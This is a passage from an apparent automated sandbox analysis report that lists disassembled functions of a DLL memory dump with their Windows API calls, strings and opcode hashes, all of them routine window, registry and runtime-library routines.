Function 1002B84C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128stringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 1002B878
lstrlenA.KERNEL32(?), ref: 1002B8C3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002B8DD
_wcslen.LIBCMT ref: 1002B901

Strings

System, xrefs: 1002B874

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
String ID: System
API String ID: 4253822919-3470857405
Opcode ID: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
Instruction ID: 7b5a175680f670ca79b6c2ec9272e95e82f354ff2106dbd97111df154043a3f4
Opcode Fuzzy Hash: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
Instruction Fuzzy Hash: C8412671D00619DFDB14CFA4DC85AAEBBB9FF04310F64812AE516EB285E770AD85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100270BC, Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 100270EF
PeekMessageA.USER32 ref: 10027113
UpdateWindow.USER32(?), ref: 1002712E
SendMessageA.USER32 ref: 1002714F
SendMessageA.USER32 ref: 10027167
UpdateWindow.USER32(?), ref: 100271AA
PeekMessageA.USER32 ref: 100271DB

Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
Instruction ID: e439185c47b7e5e34c348b8e0b3dbe5bb3c4b57b45cec7e657144295835a6737
Opcode Fuzzy Hash: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
Instruction Fuzzy Hash: 9041C370E00246EBDB11CF69DC84E9FBBF8FF82B81F90815DE949A2150D7719A50DB10

Uniqueness

Uniqueness Score: -1.00%

Function 10027676, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 10027705
SendMessageA.USER32 ref: 1002772E
GetWindowLongA.USER32 ref: 10027740
GetWindowLongA.USER32 ref: 10027751
SetWindowLongA.USER32 ref: 1002776D

Strings

,, xrefs: 10027724

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
Instruction ID: f848ae84a4977e1a31b52bc52376e27e10e8709ed1b3efe9ee7841c93cdd6a05
Opcode Fuzzy Hash: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
Instruction Fuzzy Hash: 1431C134600B119FC715DF78E888A6AB7F5FF48350B92056DE58997691DB70E800CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1002245E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10022468
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1002254E
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002256B
RegCloseKey.ADVAPI32(?), ref: 1002258B
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 100225A6

Strings

Software\, xrefs: 100224CC

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseEnumH_prolog3_OpenQueryValue
String ID: Software\
API String ID: 1666054129-964853688
Opcode ID: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
Instruction ID: 3764a028f082780bf1b34d3e1a3aecc110f1b9c57831791e493d608046546682
Opcode Fuzzy Hash: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
Instruction Fuzzy Hash: 3C41AC35800128EBCB22DBA0CC81AEEB3B8FF49310F5045D9F249E2191DB34AB958F94

Uniqueness

Uniqueness Score: -1.00%

Function 100222E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 100222EA
RegOpenKeyA.ADVAPI32(?,?,?), ref: 10022378
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002239B

Part of subcall function 1002228B: __EH_prolog3.LIBCMT ref: 10022292

Strings

Software\Classes\, xrefs: 1002232B

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: EnumH_prolog3H_prolog3_catch_Open
String ID: Software\Classes\
API String ID: 3518408925-1121929649
Opcode ID: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
Instruction ID: 704202dc6e21b2fa8b48efa6eea704b7fc6a1643c8ca87a9ade3220d51c06aab
Opcode Fuzzy Hash: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
Instruction Fuzzy Hash: A1317C36C00068EBDB22EBA4CD44BDDB6B8FB09350F5141D5F999A3252DA306FA49F91

Uniqueness

Uniqueness Score: -1.00%

Function 1002B26C, Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 1002B279
SendMessageA.USER32 ref: 1002B294
GetFocus.USER32 ref: 1002B2A9
SendMessageA.USER32 ref: 1002B2B7
GetLastActivePopup.USER32(?), ref: 1002B2E0
SendMessageA.USER32 ref: 1002B2ED

Part of subcall function 1002881E: GetWindowLongA.USER32 ref: 10028844
Part of subcall function 1002881E: GetParent.USER32(?), ref: 10028852

SendMessageA.USER32 ref: 1002B313

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastLongParentPopupWindow
String ID:
API String ID: 3338174999-0
Opcode ID: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
Instruction ID: 3a08670cfc868389e080b955865bcb0f045f405a5b874c30a2897e43bb08e3ed
Opcode Fuzzy Hash: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
Instruction Fuzzy Hash: 7F1146B590065AFFEB11DFA1DD8AC9E7E7CEF41788B910075F504A2121EB719F04AB20

Uniqueness

Uniqueness Score: -1.00%

Function 1002AAF8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 1002AB28
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB4B
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB67
RegCloseKey.ADVAPI32(?), ref: 1002AB77
RegCloseKey.ADVAPI32(?), ref: 1002AB81

Strings

software, xrefs: 1002AB10

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
Instruction ID: fb36ca9c2f952ecb3db15ddf6cda8d32fba402c4719dfc4725c3bd37d29a496b
Opcode Fuzzy Hash: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
Instruction Fuzzy Hash: 6B11E672900158FBDB11DB9ADD88CDFBFBDEB8A750B5000AAF504A2122D7319E44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002B00C, Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?), ref: 1002B013
__CxxThrowException@8.LIBCMT ref: 1002B01D

Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002B034
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041

Part of subcall function 10023B23: __CxxThrowException@8.LIBCMT ref: 10023B39

_memset.LIBCMT ref: 1002B060
TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
Instruction ID: 36d3102e2cb30bc4552268f57227952f3745dc8c02fd82b3b9104c669509b869
Opcode Fuzzy Hash: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
Instruction Fuzzy Hash: DC115E74100605AFD725EF64DCC5D2BBBB9FF453107A0C529F969D6522CB30AC24CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1002A948, Relevance: 10.5, APIs: 7, Instructions: 30COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 1002A956
GetSysColor.USER32(00000010), ref: 1002A95D
GetSysColor.USER32(00000014), ref: 1002A964
GetSysColor.USER32(00000012), ref: 1002A96B
GetSysColor.USER32(00000006), ref: 1002A972
GetSysColorBrush.USER32(0000000F), ref: 1002A97F
GetSysColorBrush.USER32(00000006), ref: 1002A986

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
Instruction ID: 2de359d209fd3f7b37bcce9053ec3ec9da3e309d31870537ed148616a4e248d0
Opcode Fuzzy Hash: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
Instruction Fuzzy Hash: 0BF0FE719407445BD730BF724E49B47BAD1FFC4710F02092EE2458B990D6B6E441DF44

Uniqueness

Uniqueness Score: -1.00%

Function 10023266, Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 1002326D
GlobalLock.KERNEL32 ref: 10023345
CreateDialogIndirectParamA.USER32(?,?,?,10022CA4,00000000), ref: 10023374
DestroyWindow.USER32(00000000,?,1000150C,00000000,3F4813DC), ref: 100233EE
GlobalUnlock.KERNEL32(?,?,1000150C,00000000,3F4813DC), ref: 100233FE
GlobalFree.KERNEL32 ref: 10023407

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
String ID:
API String ID: 3003189058-0
Opcode ID: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
Instruction ID: 542586d5134ef99c8f61472b69a72313b72e87743f096b2e8f632b75dff3f323
Opcode Fuzzy Hash: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
Instruction Fuzzy Hash: DD519B31A0024AEFCB04DFA4E9859AEBBB5EF04350F95442DF506E7292CB70AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10037738, Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 10037760

Part of subcall function 10030430: __getptd.LIBCMT ref: 1003043E
Part of subcall function 10030430: __getptd.LIBCMT ref: 1003044C

__getptd.LIBCMT ref: 1003776A

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 10037778
__getptd.LIBCMT ref: 10037786
__getptd.LIBCMT ref: 10037791
_CallCatchBlock2.LIBCMT ref: 100377B7

Part of subcall function 100304D5: __CallSettingFrame@12.LIBCMT ref: 10030521

Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003786D
Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003787B

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
Instruction ID: fb1f34f9027f5a0fd6fb665b034cbc12c1ee6665b85233a2d450c333db5c1a8f
Opcode Fuzzy Hash: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
Instruction Fuzzy Hash: 4F1104B9C04249EFDB01DFA4D945AEE7BB1FF08315F508469F814AB251DB38AA11DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1002A8D2, Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 1002A8E3
GetDlgCtrlID.USER32 ref: 1002A8F7
GetWindowLongA.USER32 ref: 1002A907
GetWindowRect.USER32 ref: 1002A919
PtInRect.USER32(?,?,?), ref: 1002A929
GetWindow.USER32(?,00000005), ref: 1002A936

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
Instruction ID: abcb09268cf445b2c35b0e2b56c0cfd5e9caec1888beec0722017402bcd9ce52
Opcode Fuzzy Hash: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
Instruction Fuzzy Hash: FC018F32500126BBEB219F559D48EAF3BACFF463A1F414165FD15D6060DB30DA829A98

Uniqueness

Uniqueness Score: -1.00%

Function 10020982, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 1002099A
_memset.LIBCMT ref: 10020A12
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10020A75
LoadBitmapA.USER32 ref: 10020A8D

Strings

, xrefs: 100209F3

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
Instruction ID: 8ec26202c106691d72478eed222520a6e30d1cb825b7d1c94e22465ec1c68f9d
Opcode Fuzzy Hash: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
Instruction Fuzzy Hash: BD312772A003669FFB10CF289CC5B9D7BB5FB44340F9540AAF549EB182DA709E848B50

Uniqueness

Uniqueness Score: -1.00%

Function 10025110, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10025150
GetSystemMetrics.USER32 ref: 10025168
GetSystemMetrics.USER32 ref: 1002516F

Strings

B, xrefs: 1002512F
DISPLAY, xrefs: 1002518C

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
Instruction ID: b60a64a5d5410e3ad8fe5a59109b18ab5d44eebb328e5d1eff8611f1e2dd37b9
Opcode Fuzzy Hash: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
Instruction Fuzzy Hash: 4511E771901334AFEB52DF64DC85B9B7BA8EF45791F414061FD0AAE006D672D910CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 10037474, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 1003748E

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 1003749F
__getptd.LIBCMT ref: 100374AD

Strings

MOC, xrefs: 10037480
csm, xrefs: 10037487

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
Instruction ID: 4aa484bfd58dbd3435781d5c114dead901570b21edfee72e4775129354a6ca63
Opcode Fuzzy Hash: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
Instruction Fuzzy Hash: 59E012395142448FC322DA64D046B283AE4FB4A216F5A04A1E54C8F223CB38F8809692

Uniqueness

Uniqueness Score: -1.00%

Function 1002A742, Relevance: 7.6, APIs: 5, Instructions: 54stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 1002A76E
_memset.LIBCMT ref: 1002A78B
GetWindowTextA.USER32 ref: 1002A7A5
lstrcmpA.KERNEL32(00000000,?), ref: 1002A7B7
SetWindowTextA.USER32(?,?), ref: 1002A7C3

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
String ID:
API String ID: 289641511-0
Opcode ID: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
Instruction ID: 26b6340e82542b1e4468bed3117474a07e50960d7f5f1af9f26f2e201bf88dc7
